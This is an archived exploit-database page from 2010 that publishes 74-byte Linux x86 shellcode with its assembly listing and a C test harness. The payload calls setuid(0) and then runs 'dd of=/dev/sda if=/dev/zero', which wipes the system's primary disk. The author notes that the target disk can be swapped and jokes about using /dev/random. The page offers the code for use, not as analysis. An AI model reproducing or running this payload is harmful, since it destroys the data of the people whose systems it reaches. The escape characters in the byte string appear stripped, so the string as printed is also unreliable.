[linux/x86] - linux/x86 setuid(0) and dd of=/dev/sda if=/dev
Posted on 23 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>linux/x86 setuid(0) and dd of=/dev/sda if=/dev/zero shellcode 74 bytes | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: linux/x86 | Exploit author: xertux' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================================== linux/x86 setuid(0) and dd of=/dev/sda if=/dev/zero shellcode 74 bytes ====================================================================== /* * Title : Linux x86 shellcode setuid(0) and dd of=/dev/sda if=/dev/zero, 74 bytes * Author : xertux * Platform: Linux X86 (7.04) * Description : setuid(0) + dd of=/dev/sda if=/dev/zero * Size : 74 bytes * Decription : Use the dd command, we can change of and if argument to create, modify and destroy datas. Here the sda disk is format. * */ /** *BITS 32 *;Get root privileges *xor eax, eax *xor ebx, ebx *xor ecx, ecx *cdq *mov al, 0x17 *int 0x80 *;exceve(dd of=/dev/sda if=/dev/zero) *xor eax, eax ; eax become 0 *push eax ; null string termination *push 0x64642f2f ; push //dd *push 0x6e69622f ; push /bin *mov ebx, esp ; put the address of "/bin//dd" into ebx *push eax ; push null string termination *push 0x6164732f ; push /sda *push 0x2f766564 ; push dev/ *push 0x2f3d666f ; push of=/ *mov ecx, esp ; put the address of "of=/dev//sda" into ecx ==> you can change to another disk or any files *push eax ; null string termination *push 0x6f72657a ; push zero *push 0x2f766564 ; push dev/ *push 0x2f3d6669 ; push if=/ *mov edx, esp ; put the address of "if=/dev/zero" into edx ==> you can try with /dev/random, it's funny ^^ *push eax ; push null args termination *push edx ; push "if=/dev/zero" *push ecx ; push "of=/dev//sda" *push ebx ; push /bin//dd *mov ecx, esp ; argument array completed via esp *xor edx, edx *mov al, 0x0b ; put the int execve call into al *int 0x80 ; system call */ #include "stdio.h" char shellcode[] = "x31xc0x31xdbx31xc9x99xb0x17xcdx80x31xc0x50x68x2f" "x2fx64x64x68x2fx62x69x6ex89xe3x50x68x2fx73x64x61" "x68x64x65x76x2fx68x6fx66x3dx2fx89xe1x50x68x7ax65" "x72x6fx68x64x65x76x2fx68x69x66x3dx2fx89xe2x50x52" "x51x53x89xe1x31xd2xb0x0bxcdx80";; int main() { printf(" [*] Shellcode - length: %d ",strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-23]</pre></body></html>
